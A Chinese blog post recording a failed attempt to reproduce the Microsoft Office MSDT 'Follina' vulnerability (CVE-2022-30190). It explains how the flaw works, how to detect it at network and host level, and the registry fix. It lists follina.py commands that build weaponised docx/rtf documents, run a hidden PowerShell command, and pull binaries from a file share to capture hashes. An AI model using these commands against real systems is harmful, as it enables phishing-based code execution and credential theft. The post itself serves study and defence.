Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现“没”成功

已于 2022-06-09 20:45:00 修改
阅读量1.6k 收藏 3
点赞数 1
分类专栏: windows 漏洞复现 流量 文章标签: microsoft 安全 windows
于 2022-06-09 18:32:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46377671/article/details/125208789
版权
windows 同时被 3 个专栏收录
9 篇文章 0 订阅
订阅专栏
漏洞复现
3 篇文章 1 订阅
订阅专栏
流量
3 篇文章 0 订阅
订阅专栏

Microsoft Office MSDT代码执行漏洞(CVE-2022-30190)复现没成功

参考链接

https://github.com/chvancooten/follina.py

https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/ (填充大于4096字节原因)
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 受影响的版本

漏洞背景

2022年5月27日,一位名为 nao_sec 的安全研究员发现了一个从白俄罗斯 IP 上传到 VirusTotal 的恶意 Word 文档。该文档使用 Microsoft Word 远程模板功能链接恶意 HTML 文件,Winword.exe 程序处理该恶意 HTML 文件中的 js 代码时发现其中使用”ms-msdt”协议的 URL, 随即启动 msdt.exe 程序(Microsoft Support Diagnostics Tool)处理该 URL,导致内嵌在 URL 中的 powershell 命令得到执行。

2022年5月30日,微软公布该漏洞编号 CVE-2022-30190。

漏洞原理

可以通过一下命令产生可以用的docx文档

# Execute a local binary
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe

# On linux you may have to escape backslashes
python .\follina.py -t rtf -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -t docx -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -t rtf -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -t rtf -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

解压docx文档。
在这里插入图片描述

其中的document.xml.rels文件包含远程模板的注入链接。其中Type属性表明word会将改模板文件加载为OLE对象,可以看到其中一个远程模板加载的是我的kali网站上面的一个页面,其ID属性为rId1337。

OLE:Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE 不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”(数据集合和操作数据的函数)彼此进行“连接”的机制,这种连接机制和协议称为组件对象模型(COM)。OLE可以用来创建复合文档,复合文档包含了创建于不同源应用程序,有着不同类型的数据,因此它可以把文字声音图像表格、应用程序等组合在一起。可以将外部文档嵌入word中。

在这里插入图片描述

再根据word/document.xml发现此模板文件的其他属性。

在这里插入图片描述

然后查看引用的kali上的html页面。

在这里插入图片描述

html中body标签的无关内容,源RDF842l.html填充的是注释的”A“,是为了让模板文件大小大于4096字节,链接中的文章很长,是终端调用CDwnStm::Read函数中的第三个参数应该是客户端尝试从服务器读取的字节数,处于某种原因,客户端期望4096字节,在构造 CHtmPre 实例时,它的默认读取大小为 4096 字节。在使用实际响应大小更新此字段之前,客户端正在从 HTTP 响应中读取字节。由于我们的准系统负载只是一个 4096 字节以下的小 HTML 页面,客户端认为服务器没有发送所需的响应,因此终止了执行。(https://billdemirkapi.me/unpacking-cve-2021-40444-microsoft-office-rce/)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WzIb3lGp-1654770318249)(D:\download\typora\image-20220609180512291.png)]

html利用location.href进行页面的重定向,采用的协议是ms-msdt协议,根据注册表ms-msdt协议用的是msdt.exe,执行word程序加载word的进程是winword.exe,所以通过msdt.exe执行posershel命令。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OlDrv9Gc-1654770318250)(D:\download\typora\image-20220609180920280.png)]

复现过程:未成功

我这里复现出错了,msdt.exe不能运行,不知道为什么?第一次遇到,希望有人能告诉我。

在这里插入图片描述

告警分析

流量层面:

1.受害主机通过某种方式或者docx,可能是钓鱼邮件,可能邮件沙箱发生告警。

2.受害主机访问恶意url,可以在response中看到ms-msdt协议,html中无意义的注释填充大于4096,base64加密的powershell命令。

主机层面:

1.winword.exe访问远程url链接,查找注册表,打开msdt.exe执行恶意的powershell命令,有恶意负载。

解决办法

禁用msdt url协议。

1.管理员身份先备用注册表“reg export HKEY_CLASSES_ROOT\ms-msdt [filename ]”。

2.命令“reg delete HKEY_CLASSES_ROOT\ms-msdt /f”。(恢复注册表”reg import [filename]“)

ename ]”。

3.命令“reg delete HKEY_CLASSES_ROOT\ms-msdt /f”。(恢复注册表”reg import [filename]“)

cat&seven
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Office CVE-2017-8570远程代码执行漏洞复现
脚本姑娘
01-12 1322
漏洞影响版本 很尴尬,此页无图 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 201
菜单相关新词
weixin_30847271的博客
05-29 185
populate英 [ˈpɒpjuleɪt] 美 [ˈpɑ:pjuleɪt] vt.居住于;生活于;移民于;落户于 accelerator英 [əkˈseləreɪtə(r)] 美 [ækˈsɛləˌretɚ] n.加速器;催速剂 OLE Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE 不仅是桌面应用程序集...
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
最新发布
2401_84297796的博客
05-03 699
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
漏洞复现Microsoft Office MSDT 远程代码执行漏洞CVE-2022-30190
qq_17754023的博客
06-03 4695
0x01 Microsoft OfficeMicrosoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。0x02 漏洞简介该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。......
MICROSOFT OFFICE MSDT操作系统命令注入漏洞CVE-2022-30190
huayimy的博客
11-23 1235
MICROSOFT OFFICE MSDT操作系统命令注入漏洞CVE-2022-30190)输入技术支持人员提供的密钥
[CVE-2022-30190]MICROSOFT OFFICE MSDT代码执行漏洞
whoami
06-01 1246
MSDTMicrosoft Support Diagnostics Tool,微软支持诊断工具)是一个Windows实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于Microsoft Support Diagnostic Tool中的漏洞已经于4月 12日报告给微软,并已经证明该漏洞已经被黑客利用进行攻击,不过微软安全响应中心团队并未将报告的行为视为安全漏洞。 根据研究员 Kevin Beaumont
CVE-2022-30190 Follina Office RCE分析【附自定义word钓鱼模板POC】.doc
07-09
CVE-2022-30190 Follina Office RCE是一种Office远程代码执行漏洞,allowing attackers to execute arbitrary code on a vulnerable system through a specially crafted Word document. 这个漏洞影响了Microsoft ...
msdt.exe.mun
12-26
msdt.exe
mdm.exe文件
06-23
Visual Studio调试器所需的mdm.exe文件,添加后即不会报错。
Microsoft MSDT任意代码执行漏洞CVE-2022-30190
weixin_46038704的博客
06-01 652
Microsoft MSDT任意代码执行漏洞CVE-2022-30190复现
Office CVE-2017-8570漏洞复现
weixin_44283446的博客
12-20 2052
Office CVE-2017-8570漏洞复现说明描述漏洞影响版本环境说明漏洞复现参考 说明 本文仅供学习使用 描述 2017年7月,微软在例行的阅读补丁中修复了多个Microsoft Office漏洞,其中的CVE-2017-8570漏洞为一个逻辑漏洞。网上公布了利用代码,影响范围广泛。该漏洞Microsoft Office的一个远程代码执行漏洞。其成因是Microsof PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而
Microsoft Office MSDT代码执行漏洞CVE-2022-30190漏洞复现
网安君的博客
06-01 2666
漏洞首次发现在2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件,通过 ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用 Windows 程序 msdt.exe,该程序用于运行各种 Windows 疑难解答程序包。此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用 ‘ms-msdt’ URI执行任意PowerShell代码。目前已知影
CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞
Ba1_Ma0的博客
06-09 9871
在微软官方的介绍里,是从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。意思是恶意 Word 文档可以使用远程模板功能从远程服务器获取 HTML 文件,并且 HTML 代码可以使用 Microsoft 的 MS-MSDT URI 协议方案来加载其他代码执行 PowerShell 代码与其他的漏洞不同,要利用此漏洞,攻击者只需要用户打开恶意文档即可,保存为RTF文件后,用户只是预览恶意文件,不用单击或者双击恶意
漏洞通告 | Microsoft MSDT 路径便利漏洞;Owl labs Meeting Owl Pro信息泄露漏洞
zz_tech的博客
06-15 401
Microsoft MSDT 路径便利漏洞;Owl labs Meeting Owl Pro信息泄露漏洞
Windows MSDT RCE(CVE-2022-30190)复现
Love&Share
06-07 1450
Windows MSDT RCE(CVE-2022-30190)复现
CVE-2022-30190 MSDT远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-29 986
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码
Word MSDT代码执行漏洞,影响用户多范围广(CVE-2022-30190
murphysec的博客
05-31 406
CVE-2022-30190 漏洞,Word 程序使用 URL 协议调用 MSDT 时存在远程代码执行漏洞。影响用户多,影响范围广,建议用户按照官方教程禁用 MSDT URL 协议。 编号      CVE-2022-30190 标题 Word 代码执行漏洞 描述 Microsoft Office Word 是微软公司的一个文字处理器应用程序。Word 使用 URL 协议调用 MSDT有做限制,导致可以执行任意远程代码。影响用户多,影响范围广,建议用户按照官方教程禁用 MSDT U
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值